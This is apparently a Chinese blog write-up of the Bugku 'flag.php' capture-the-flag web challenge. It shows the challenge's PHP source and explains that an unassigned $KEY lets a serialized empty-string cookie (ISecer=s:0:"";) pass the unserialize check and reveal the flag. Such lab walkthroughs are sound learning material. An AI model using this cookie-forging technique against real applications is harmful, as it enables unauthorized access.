bugku-Web flag.php
2024-10-08 15:49:12
打开网页发现并没有什么,试了很多次没用。
其实题目中提示了hint,我们就传递一个hint=1试试,发现出现了代码:
<?php
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE['ISecer'];
if(isset($_GET['hint'])){
show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{
echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center">
<form method="POST" action="#">
<p><input name="user" type="text" placeholder="Username"></p>
<p><input name="password" type="password" placeholder="Password"></p>
<p><input value="Login" type="button"/></p>
</form>
</div>
</body>
</html>
<?php
}
$KEY='ISecer:www.isecer.com';
?>
意思就是如果cookie的反序列化值等于$KEY,就给你flag。
不要看最下面的$KEY的值,因为上面根本没有对$KEY赋值,所以上面$KEY的值为空,我们就写个代码得到空值的序列化值,再传上去让他反序列化下就行了
<?php
$KEY="";
print(serialize($KEY));
?>
得到s:0:"";
于是传递cookie为ISecer=s:0:"";就拿到flag了。
最新文章
- 【Alpha阶段】第三次Scrum例会
- September 7th 2016 Week 37th Wednesday
- 动手动脑之小程序:TryAndCatch
- 实现的一个ajax请求组件 有加载效果
- Python数据结构与算法--算法分析
- fiddler Android下https抓包全攻略
- JDK环境变量中dt.jar、tools.jar等变量值的作用
- [Java][20160707]Java语言介绍
- Java中的Switch用法
- makinacorpus/spynner
- PHP - 使用 Pear 进行安装和卸载包
- shell中的条件表达式
- js多个元素随机且不重叠分布在页面中
- Python中append()与extend()的区别
- 实现promise
- F. Asya And Kittens 并查集维护链表
- 067、如何部署Calico网络 (2019-04-10 周三)
- C内存开辟与平移
- VS中快捷键修改以及快捷键的查看
- C/C++笔记 #035# Makefile